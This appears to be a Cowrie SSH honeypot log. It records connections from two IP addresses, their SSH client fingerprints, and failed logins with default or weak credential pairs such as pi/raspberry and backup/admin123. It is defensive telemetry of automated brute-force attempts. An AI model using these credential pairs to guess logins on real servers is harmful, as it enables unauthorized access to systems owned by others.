{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:35:08.070392Z","src_ip":"212.227.235.229","session":"d7783701d8a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57060,"dst_ip":"1.2.3.4","dst_port":22,"session":"15b2bb08eb0a","protocol":"ssh","message":"New connection: 212.227.125.160:57060 (1.2.3.4:22) [session: 15b2bb08eb0a]","sensor":"my-vps","timestamp":"2025-08-31T00:35:10.668601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:10.816430Z","src_ip":"212.227.125.160","session":"15b2bb08eb0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:35:10.817165Z","src_ip":"212.227.125.160","session":"15b2bb08eb0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50164,"dst_ip":"1.2.3.4","dst_port":22,"session":"24173da8f1f9","protocol":"ssh","message":"New connection: 212.227.235.229:50164 (1.2.3.4:22) [session: 24173da8f1f9]","sensor":"my-vps","timestamp":"2025-08-31T00:35:11.143405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:35:11.144329Z","src_ip":"212.227.235.229","session":"24173da8f1f9"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:11.207863Z","src_ip":"212.227.125.160","session":"15b2bb08eb0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:35:11.450151Z","src_ip":"212.227.235.229","session":"24173da8f1f9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:12.357569Z","src_ip":"212.227.125.160","session":"15b2bb08eb0a"}
{"eventid":"cowrie.login.failed","username":"michael","password":"michael","message":"login attempt [michael/michael] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:12.719462Z","src_ip":"212.227.235.229","session":"24173da8f1f9"}
{"eventid":"cowrie.login.failed","username":"backup","password":"admin123","message":"login attempt [backup/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:13.347303Z","src_ip":"212.227.235.229","session":"d7783701d8a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"e78898891870","protocol":"ssh","message":"New connection: 212.227.125.160:51824 (1.2.3.4:22) [session: e78898891870]","sensor":"my-vps","timestamp":"2025-08-31T00:35:13.968849Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:14.027941Z","src_ip":"212.227.235.229","session":"24173da8f1f9"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:14.033748Z","src_ip":"212.227.125.160","session":"e78898891870"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:15.316448Z","src_ip":"212.227.235.229","session":"d7783701d8a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54802,"dst_ip":"1.2.3.4","dst_port":22,"session":"46ddadaaec59","protocol":"ssh","message":"New connection: 212.227.125.160:54802 (1.2.3.4:22) [session: 46ddadaaec59]","sensor":"my-vps","timestamp":"2025-08-31T00:35:20.950961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:20.951888Z","src_ip":"212.227.125.160","session":"46ddadaaec59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:35:21.025636Z","src_ip":"212.227.125.160","session":"46ddadaaec59"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:21.331259Z","src_ip":"212.227.125.160","session":"46ddadaaec59"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:22.480231Z","src_ip":"212.227.125.160","session":"46ddadaaec59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59894,"dst_ip":"1.2.3.4","dst_port":22,"session":"51930b0196bb","protocol":"ssh","message":"New connection: 212.227.125.160:59894 (1.2.3.4:22) [session: 51930b0196bb]","sensor":"my-vps","timestamp":"2025-08-31T00:35:29.299826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:29.892268Z","src_ip":"212.227.125.160","session":"51930b0196bb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:35:29.892915Z","src_ip":"212.227.125.160","session":"51930b0196bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34106,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac08a55c410f","protocol":"ssh","message":"New connection: 212.227.125.160:34106 (1.2.3.4:22) [session: ac08a55c410f]","sensor":"my-vps","timestamp":"2025-08-31T00:35:31.073720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:31.074574Z","src_ip":"212.227.125.160","session":"ac08a55c410f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:35:31.151943Z","src_ip":"212.227.125.160","session":"ac08a55c410f"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:31.417346Z","src_ip":"212.227.125.160","session":"ac08a55c410f"}
{"eventid":"cowrie.login.failed","username":"backup","password":"admin123","message":"login attempt [backup/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:31.899231Z","src_ip":"212.227.125.160","session":"51930b0196bb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:32.560798Z","src_ip":"212.227.125.160","session":"ac08a55c410f"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:33.843428Z","src_ip":"212.227.125.160","session":"51930b0196bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37998,"dst_ip":"1.2.3.4","dst_port":22,"session":"a508ad07885f","protocol":"ssh","message":"New connection: 212.227.125.160:37998 (1.2.3.4:22) [session: a508ad07885f]","sensor":"my-vps","timestamp":"2025-08-31T00:35:41.425684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:41.426733Z","src_ip":"212.227.125.160","session":"a508ad07885f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:35:41.500161Z","src_ip":"212.227.125.160","session":"a508ad07885f"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:41.729151Z","src_ip":"212.227.125.160","session":"a508ad07885f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:42.806869Z","src_ip":"212.227.125.160","session":"a508ad07885f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45352,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5e3af00acbe","protocol":"ssh","message":"New connection: 212.227.125.160:45352 (1.2.3.4:22) [session: e5e3af00acbe]","sensor":"my-vps","timestamp":"2025-08-31T00:35:51.834925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:35:51.835895Z","src_ip":"212.227.125.160","session":"e5e3af00acbe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:35:51.910227Z","src_ip":"212.227.125.160","session":"e5e3af00acbe"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-31T00:35:52.132053Z","src_ip":"212.227.125.160","session":"e5e3af00acbe"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:35:53.223873Z","src_ip":"212.227.125.160","session":"e5e3af00acbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55692,"dst_ip":"1.2.3.4","dst_port":22,"session":"08d63be698c2","protocol":"ssh","message":"New connection: 212.227.125.160:55692 (1.2.3.4:22) [session: 08d63be698c2]","sensor":"my-vps","timestamp":"2025-08-31T00:36:02.274959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:02.275788Z","src_ip":"212.227.125.160","session":"08d63be698c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:02.349151Z","src_ip":"212.227.125.160","session":"08d63be698c2"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:02.571775Z","src_ip":"212.227.125.160","session":"08d63be698c2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:03.734409Z","src_ip":"212.227.125.160","session":"08d63be698c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45346,"dst_ip":"1.2.3.4","dst_port":22,"session":"324b397fd2af","protocol":"ssh","message":"New connection: 212.227.125.160:45346 (1.2.3.4:22) [session: 324b397fd2af]","sensor":"my-vps","timestamp":"2025-08-31T00:36:06.713140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:07.959226Z","src_ip":"212.227.125.160","session":"324b397fd2af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:07.960019Z","src_ip":"212.227.125.160","session":"324b397fd2af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52310,"dst_ip":"1.2.3.4","dst_port":22,"session":"77cb0e4928b1","protocol":"ssh","message":"New connection: 212.227.235.229:52310 (1.2.3.4:22) [session: 77cb0e4928b1]","sensor":"my-vps","timestamp":"2025-08-31T00:36:11.073903Z"}
